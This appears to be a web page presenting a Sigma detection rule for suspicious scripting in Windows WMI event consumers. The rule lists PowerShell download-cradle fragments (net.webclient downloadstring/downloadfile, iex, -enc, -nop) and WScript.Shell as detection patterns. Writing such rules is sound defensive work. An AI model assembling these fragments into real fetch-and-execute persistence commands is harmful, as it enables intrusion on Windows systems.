Suspicious Scripting in a WMI Consumer
Detects suspicious commands that are related to scripting/powershell in WMI Event Consumers
Sigma rule (View on GitHub)
1title: Suspicious Scripting in a WMI Consumer
2id: fe21810c-2a8c-478f-8dd3-5a287fb2a0e0
3status: test
4description: Detects suspicious commands that are related to scripting/powershell in WMI Event Consumers
5references:
6 - https://in.security/an-intro-into-abusing-and-identifying-wmi-event-subscriptions-for-persistence/
7 - https://github.com/Neo23x0/signature-base/blob/615bf1f6bac3c1bdc417025c40c073e6c2771a76/yara/gen_susp_lnk_files.yar#L19
8 - https://github.com/RiccardoAncarani/LiquidSnake
9author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro
10date: 2019-04-15
11modified: 2023-09-09
12tags:
13 - attack.execution
14 - attack.t1059.005
15logsource:
16 product: windows
17 category: wmi_event
18detection:
19 selection_destination:
20 - Destination|contains|all:
21 - 'new-object'
22 - 'net.webclient'
23 - '.downloadstring'
24 - Destination|contains|all:
25 - 'new-object'
26 - 'net.webclient'
27 - '.downloadfile'
28 - Destination|contains:
29 - ' iex('
30 - ' -nop '
31 - ' -noprofile '
32 - ' -decode '
33 - ' -enc '
34 - 'WScript.Shell'
35 - 'System.Security.Cryptography.FromBase64Transform'
36 condition: selection_destination
37fields:
38 - User
39 - Operation
40falsepositives:
41 - Legitimate administrative scripts
42level: high
References
-
Windows Management Instrumentation (WMI) Event Subscriptions are one of many ways to establish persistence on a network.
Read More -
-
LiquidSnake is a tool that allows operators to perform fileless lateral movement using WMI Event Subscriptions and GadgetToJScript - RiccardoAncarani/LiquidSnake
Read More
Related rules
- Adwind RAT / JRAT
- Adwind RAT / JRAT File Artifact
- Csc.EXE Execution Form Potentially Suspicious Parent
- Cscript/Wscript Uncommon Script Extension Execution
- File Was Not Allowed To Run